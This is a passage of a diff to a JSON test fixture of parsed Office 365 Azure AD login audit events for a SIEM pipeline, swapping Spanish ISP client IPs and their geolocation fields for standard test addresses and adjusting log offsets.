-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -991,8 +975,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:51:49.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1010,7 +994,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 14214,
+        "log.offset": 14194,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1027,10 +1011,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:51:49",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1059,20 +1043,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -1090,8 +1073,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:29:02.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1109,7 +1092,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 15664,
+        "log.offset": 15644,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1126,10 +1109,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:29:02",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1158,20 +1141,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1189,8 +1170,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:08.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1208,7 +1189,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 17114,
+        "log.offset": 17092,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1225,10 +1206,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:08",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1257,20 +1238,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1288,8 +1267,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:27.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1307,7 +1286,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 18564,
+        "log.offset": 18540,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1324,10 +1303,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:27",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1356,20 +1335,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -1387,8 +1364,8 @@
     },
     {
         "@timestamp": "2020-02-08T14:33:54.000Z",
-        "client.address": "37.29.234.179",
-        "client.ip": "37.29.234.179",
+        "client.address": "67.43.156.12",
+        "client.ip": "67.43.156.12",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1406,7 +1383,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 20013,
+        "log.offset": 19985,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1423,10 +1400,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "37.29.234.179",
+        "o365.audit.ActorIpAddress": "67.43.156.12",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "37.29.234.179",
+        "o365.audit.ClientIP": "67.43.156.12",
         "o365.audit.CreationTime": "2020-02-08T14:33:54",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1455,17 +1432,16 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "37.29.234.179",
+        "related.ip": "67.43.156.12",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 16299,
-        "source.as.organization.name": "XFERA Moviles S.A.",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4172,
-        "source.geo.location.lon": -3.684,
-        "source.ip": "37.29.234.179",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "forwarded"
         ],
@@ -1483,8 +1459,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:12.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1502,7 +1478,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 21463,
+        "log.offset": 21433,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1519,10 +1495,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:12",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1551,20 +1527,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1582,8 +1556,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:35.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1601,7 +1575,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 22913,
+        "log.offset": 22881,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1618,10 +1592,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:35",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1650,20 +1624,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -1681,8 +1654,8 @@
     },
     {
         "@timestamp": "2020-02-08T14:38:40.000Z",
-        "client.address": "37.29.234.179",
-        "client.ip": "37.29.234.179",
+        "client.address": "67.43.156.12",
+        "client.ip": "67.43.156.12",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1700,7 +1673,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 24306,
+        "log.offset": 24274,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1717,10 +1690,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "37.29.234.179",
+        "o365.audit.ActorIpAddress": "67.43.156.12",
         "o365.audit.ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "37.29.234.179",
+        "o365.audit.ClientIP": "67.43.156.12",
         "o365.audit.CreationTime": "2020-02-08T14:38:40",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1749,17 +1722,16 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "37.29.234.179",
+        "related.ip": "67.43.156.12",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 16299,
-        "source.as.organization.name": "XFERA Moviles S.A.",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4172,
-        "source.geo.location.lon": -3.684,
-        "source.ip": "37.29.234.179",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "forwarded"
         ],
@@ -1777,8 +1749,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:16.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1796,7 +1768,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 25755,
+        "log.offset": 25721,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1813,10 +1785,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:16",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1845,20 +1817,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1876,8 +1846,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:16.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1895,7 +1865,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 27205,
+        "log.offset": 27169,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1912,10 +1882,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:16",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1944,20 +1914,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1975,8 +1943,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:25.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -1994,7 +1962,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 28655,
+        "log.offset": 28617,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2011,10 +1979,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:25",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2043,20 +2011,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -2074,8 +2041,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:04.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2093,7 +2060,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 30048,
+        "log.offset": 30010,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2110,10 +2077,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:44:04",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2142,20 +2109,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -2173,8 +2138,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:51:45.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2192,7 +2157,7 @@
